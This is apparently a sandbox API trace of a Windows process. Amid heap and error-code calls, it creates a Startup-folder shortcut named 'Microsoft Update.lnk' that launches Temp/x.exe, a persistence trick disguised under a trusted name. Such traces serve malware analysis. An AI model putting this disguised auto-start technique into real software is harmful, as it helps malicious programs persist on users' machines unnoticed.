[0270.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0270.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0270.691] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0270.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0270.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0270.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0270.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0270.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0270.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0270.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0270.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0270.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0270.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0270.692] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0270.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0270.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0270.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0270.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0270.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0270.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0270.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0270.693] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0270.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0270.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0270.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0270.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0270.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0270.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0270.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0270.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0270.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0270.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0270.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0270.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0270.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0270.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0270.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0270.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0270.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0270.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0270.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0270.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0270.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0270.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0270.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0270.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0270.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0270.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0270.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0270.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0270.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0270.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0270.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0270.696] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0270.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0270.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0270.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0270.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0270.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0270.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0270.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0270.696] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0270.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0270.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b2e00 [0270.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0270.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0270.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0270.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0270.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0270.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0270.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0270.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0270.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0270.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0270.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0270.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0270.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0270.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0270.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2ec8 [0270.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0270.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0270.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0270.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0270.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0270.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0270.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0270.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0270.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0270.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0270.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0270.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0270.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0270.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0270.699] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0270.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0270.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0270.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0270.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0270.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0270.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0270.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0270.700] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0270.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0270.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0270.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0270.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0270.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0270.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0270.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0270.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0270.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0270.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0270.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0270.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0270.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0270.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0270.701] GetLastError () returned 0x3f0 [0270.701] SetLastError (dwErrCode=0x3f0) [0270.701] GetLastError () returned 0x3f0 [0270.701] SetLastError (dwErrCode=0x3f0) [0270.701] GetLastError () returned 0x3f0 [0270.701] SetLastError (dwErrCode=0x3f0) [0270.701] GetLastError () returned 0x3f0 [0270.701] SetLastError (dwErrCode=0x3f0) [0270.701] GetLastError () returned 0x3f0 [0270.701] SetLastError (dwErrCode=0x3f0) [0270.701] GetLastError () returned 0x3f0 [0270.701] SetLastError (dwErrCode=0x3f0) [0270.702] GetLastError () returned 0x3f0 [0270.702] SetLastError (dwErrCode=0x3f0) [0270.702] GetLastError () returned 0x3f0 [0270.702] SetLastError (dwErrCode=0x3f0) [0270.702] GetLastError () returned 0x3f0 [0270.702] SetLastError (dwErrCode=0x3f0) [0270.702] GetLastError () returned 0x3f0 [0270.702] SetLastError (dwErrCode=0x3f0) [0270.702] GetLastError () returned 0x3f0 [0270.702] SetLastError (dwErrCode=0x3f0) [0270.702] GetLastError () returned 0x3f0 [0270.702] SetLastError (dwErrCode=0x3f0) [0270.702] GetLastError () returned 0x3f0 [0270.703] SetLastError (dwErrCode=0x3f0) [0270.703] GetLastError () returned 0x3f0 [0270.703] SetLastError (dwErrCode=0x3f0) [0270.703] GetLastError () returned 0x3f0 [0270.703] SetLastError (dwErrCode=0x3f0) [0270.703] GetLastError () returned 0x3f0 [0270.703] SetLastError (dwErrCode=0x3f0) [0270.703] GetLastError () returned 0x3f0 [0270.703] SetLastError (dwErrCode=0x3f0) [0270.703] GetLastError () returned 0x3f0 [0270.703] SetLastError (dwErrCode=0x3f0) [0270.703] GetLastError () returned 0x3f0 [0270.703] SetLastError (dwErrCode=0x3f0) [0270.703] GetLastError () returned 0x3f0 [0270.703] SetLastError (dwErrCode=0x3f0) [0270.703] GetLastError () returned 0x3f0 [0270.704] SetLastError (dwErrCode=0x3f0) [0270.704] GetLastError () returned 0x3f0 [0270.704] SetLastError (dwErrCode=0x3f0) [0270.704] GetLastError () returned 0x3f0 [0270.704] SetLastError (dwErrCode=0x3f0) [0270.704] GetLastError () returned 0x3f0 [0270.704] SetLastError (dwErrCode=0x3f0) [0270.704] GetLastError () returned 0x3f0 [0270.704] SetLastError (dwErrCode=0x3f0) [0270.704] GetLastError () returned 0x3f0 [0270.704] SetLastError (dwErrCode=0x3f0) [0270.704] GetLastError () returned 0x3f0 [0270.704] SetLastError (dwErrCode=0x3f0) [0270.704] GetLastError () returned 0x3f0 [0270.705] SetLastError (dwErrCode=0x3f0) [0270.705] GetLastError () returned 0x3f0 [0270.705] SetLastError (dwErrCode=0x3f0) [0270.705] GetLastError () returned 0x3f0 [0270.705] SetLastError (dwErrCode=0x3f0) [0270.705] GetLastError () returned 0x3f0 [0270.705] SetLastError (dwErrCode=0x3f0) [0270.705] GetLastError () returned 0x3f0 [0270.705] SetLastError (dwErrCode=0x3f0) [0270.705] GetLastError () returned 0x3f0 [0270.705] SetLastError (dwErrCode=0x3f0) [0270.705] GetLastError () returned 0x3f0 [0270.705] SetLastError (dwErrCode=0x3f0) [0270.705] GetLastError () returned 0x3f0 [0270.705] SetLastError (dwErrCode=0x3f0) [0270.705] GetLastError () returned 0x3f0 [0270.706] SetLastError (dwErrCode=0x3f0) [0270.706] GetLastError () returned 0x3f0 [0270.706] SetLastError (dwErrCode=0x3f0) [0270.706] GetLastError () returned 0x3f0 [0270.706] SetLastError (dwErrCode=0x3f0) [0270.706] GetLastError () returned 0x3f0 [0270.706] SetLastError (dwErrCode=0x3f0) [0270.706] GetLastError () returned 0x3f0 [0270.706] SetLastError (dwErrCode=0x3f0) [0270.706] GetLastError () returned 0x3f0 [0270.706] SetLastError (dwErrCode=0x3f0) [0270.706] GetLastError () returned 0x3f0 [0270.706] SetLastError (dwErrCode=0x3f0) [0270.706] GetLastError () returned 0x3f0 [0270.707] SetLastError (dwErrCode=0x3f0) [0270.707] GetLastError () returned 0x3f0 [0270.707] SetLastError (dwErrCode=0x3f0) [0270.707] GetLastError () returned 0x3f0 [0270.708] SetLastError (dwErrCode=0x3f0) [0270.708] GetLastError () returned 0x3f0 [0270.708] SetLastError (dwErrCode=0x3f0) [0270.708] GetLastError () returned 0x3f0 [0270.708] SetLastError (dwErrCode=0x3f0) [0270.708] GetLastError () returned 0x3f0 [0270.708] SetLastError (dwErrCode=0x3f0) [0270.708] GetLastError () returned 0x3f0 [0270.708] SetLastError (dwErrCode=0x3f0) [0270.708] GetLastError () returned 0x3f0 [0270.708] SetLastError (dwErrCode=0x3f0) [0270.708] GetLastError () returned 0x3f0 [0270.708] SetLastError (dwErrCode=0x3f0) [0270.708] GetLastError () returned 0x3f0 [0270.709] SetLastError (dwErrCode=0x3f0) [0270.709] GetLastError () returned 0x3f0 [0270.709] SetLastError (dwErrCode=0x3f0) [0270.709] GetLastError () returned 0x3f0 [0270.709] SetLastError (dwErrCode=0x3f0) [0270.709] GetLastError () returned 0x3f0 [0270.709] SetLastError (dwErrCode=0x3f0) [0270.709] GetLastError () returned 0x3f0 [0270.709] SetLastError (dwErrCode=0x3f0) [0270.709] GetLastError () returned 0x3f0 [0270.709] SetLastError (dwErrCode=0x3f0) [0270.709] GetLastError () returned 0x3f0 [0270.709] SetLastError (dwErrCode=0x3f0) [0270.709] GetLastError () returned 0x3f0 [0270.710] SetLastError (dwErrCode=0x3f0) [0270.710] GetLastError () returned 0x3f0 [0270.710] SetLastError (dwErrCode=0x3f0) [0270.710] GetLastError () returned 0x3f0 [0270.710] SetLastError (dwErrCode=0x3f0) [0270.710] GetLastError () returned 0x3f0 [0270.710] SetLastError (dwErrCode=0x3f0) [0270.710] GetLastError () returned 0x3f0 [0270.710] SetLastError (dwErrCode=0x3f0) [0270.710] GetLastError () returned 0x3f0 [0270.710] SetLastError (dwErrCode=0x3f0) [0270.710] GetLastError () returned 0x3f0 [0270.711] SetLastError (dwErrCode=0x3f0) [0270.711] GetLastError () returned 0x3f0 [0270.711] SetLastError (dwErrCode=0x3f0) [0270.711] GetLastError () returned 0x3f0 [0270.711] SetLastError (dwErrCode=0x3f0) [0270.711] GetLastError () returned 0x3f0 [0270.711] SetLastError (dwErrCode=0x3f0) [0270.711] GetLastError () returned 0x3f0 [0270.711] SetLastError (dwErrCode=0x3f0) [0270.711] GetLastError () returned 0x3f0 [0270.711] SetLastError (dwErrCode=0x3f0) [0270.711] GetLastError () returned 0x3f0 [0270.711] SetLastError (dwErrCode=0x3f0) [0270.711] GetLastError () returned 0x3f0 [0270.711] SetLastError (dwErrCode=0x3f0) [0270.712] GetLastError () returned 0x3f0 [0270.712] SetLastError (dwErrCode=0x3f0) [0270.712] GetLastError () returned 0x3f0 [0270.712] SetLastError (dwErrCode=0x3f0) [0270.712] GetLastError () returned 0x3f0 [0270.712] SetLastError (dwErrCode=0x3f0) [0270.712] GetLastError () returned 0x3f0 [0270.712] SetLastError (dwErrCode=0x3f0) [0270.712] GetLastError () returned 0x3f0 [0270.712] SetLastError (dwErrCode=0x3f0) [0270.712] GetLastError () returned 0x3f0 [0270.712] SetLastError (dwErrCode=0x3f0) [0270.712] GetLastError () returned 0x3f0 [0270.712] SetLastError (dwErrCode=0x3f0) [0270.713] GetLastError () returned 0x3f0 [0270.713] SetLastError (dwErrCode=0x3f0) [0270.713] GetLastError () returned 0x3f0 [0270.713] SetLastError (dwErrCode=0x3f0) [0270.713] GetLastError () returned 0x3f0 [0270.713] SetLastError (dwErrCode=0x3f0) [0270.713] GetLastError () returned 0x3f0 [0270.713] SetLastError (dwErrCode=0x3f0) [0270.713] GetLastError () returned 0x3f0 [0270.713] SetLastError (dwErrCode=0x3f0) [0270.713] GetLastError () returned 0x3f0 [0270.713] SetLastError (dwErrCode=0x3f0) [0270.713] GetLastError () returned 0x3f0 [0270.713] SetLastError (dwErrCode=0x3f0) [0270.713] GetLastError () returned 0x3f0 [0270.714] SetLastError (dwErrCode=0x3f0) [0270.714] GetLastError () returned 0x3f0 [0270.714] SetLastError (dwErrCode=0x3f0) [0270.714] GetLastError () returned 0x3f0 [0270.714] SetLastError (dwErrCode=0x3f0) [0270.714] GetLastError () returned 0x3f0 [0270.714] SetLastError (dwErrCode=0x3f0) [0270.714] GetLastError () returned 0x3f0 [0270.714] SetLastError (dwErrCode=0x3f0) [0270.714] GetLastError () returned 0x3f0 [0270.714] SetLastError (dwErrCode=0x3f0) [0270.714] GetLastError () returned 0x3f0 [0270.714] SetLastError (dwErrCode=0x3f0) [0270.715] GetLastError () returned 0x3f0 [0270.715] SetLastError (dwErrCode=0x3f0) [0270.715] GetLastError () returned 0x3f0 [0270.715] SetLastError (dwErrCode=0x3f0) [0270.715] GetLastError () returned 0x3f0 [0270.715] SetLastError (dwErrCode=0x3f0) [0270.715] GetLastError () returned 0x3f0 [0270.715] SetLastError (dwErrCode=0x3f0) [0270.715] GetLastError () returned 0x3f0 [0270.715] SetLastError (dwErrCode=0x3f0) [0270.715] GetLastError () returned 0x3f0 [0270.715] SetLastError (dwErrCode=0x3f0) [0270.716] GetLastError () returned 0x3f0 [0270.716] SetLastError (dwErrCode=0x3f0) [0270.716] GetLastError () returned 0x3f0 [0270.716] SetLastError (dwErrCode=0x3f0) [0270.716] GetLastError () returned 0x3f0 [0270.716] SetLastError (dwErrCode=0x3f0) [0270.716] GetLastError () returned 0x3f0 [0270.716] SetLastError (dwErrCode=0x3f0) [0270.716] GetLastError () returned 0x3f0 [0270.716] SetLastError (dwErrCode=0x3f0) [0270.716] GetLastError () returned 0x3f0 [0270.716] SetLastError (dwErrCode=0x3f0) [0270.716] GetLastError () returned 0x3f0 [0270.717] SetLastError (dwErrCode=0x3f0) [0270.717] GetLastError () returned 0x3f0 [0270.717] SetLastError (dwErrCode=0x3f0) [0270.717] GetLastError () returned 0x3f0 [0270.717] SetLastError (dwErrCode=0x3f0) [0270.717] GetLastError () returned 0x3f0 [0270.717] SetLastError (dwErrCode=0x3f0) [0270.717] GetLastError () returned 0x3f0 [0270.717] SetLastError (dwErrCode=0x3f0) [0270.717] GetLastError () returned 0x3f0 [0270.717] SetLastError (dwErrCode=0x3f0) [0270.717] GetLastError () returned 0x3f0 [0270.717] SetLastError (dwErrCode=0x3f0) [0270.718] GetLastError () returned 0x3f0 [0270.718] SetLastError (dwErrCode=0x3f0) [0270.718] GetLastError () returned 0x3f0 [0270.718] SetLastError (dwErrCode=0x3f0) [0270.718] GetLastError () returned 0x3f0 [0270.718] SetLastError (dwErrCode=0x3f0) [0270.718] GetLastError () returned 0x3f0 [0270.718] CoInitialize (pvReserved=0x0) returned 0x0 [0270.719] CoCreateInstance (in: rclsid=0x482a08*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4828a8*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8bf874 | out: ppv=0x8bf874*=0xb01e60) returned 0x0 [0270.721] ShellLink:IShellLinkW:SetPath (This=0xb01e60, pszFile="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/x.exe") returned 0x0 [0280.103] ShellLink:IShellLinkW:SetWorkingDirectory (This=0xb01e60, pszDir="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x0 [0280.103] ShellLink:IUnknown:QueryInterface (in: This=0xb01e60, riid=0x482968*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8bf87c | out: ppvObject=0x8bf87c*=0xb01e6c) returned 0x0 [0280.103] ShellLink:IPersistFile:Save (This=0xb01e6c, pszFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk", fRemember=1) returned 0x0 [0280.407] ShellLink:IUnknown:Release (This=0xb01e6c) returned 0x1 [0280.407] ShellLink:IUnknown:Release (This=0xb01e60) returned 0x0 [0280.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0280.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0280.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0280.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0280.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ec8 | out: hHeap=0x25c0000) returned 1 [0280.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0280.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0280.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0280.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0280.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0280.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0280.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0280.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0280.409] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0280.410] TranslateMessage (lpMsg=0x8bf970) returned 0 [0280.410] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0280.410] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0280.410] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0280.411] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0280.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0280.411] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 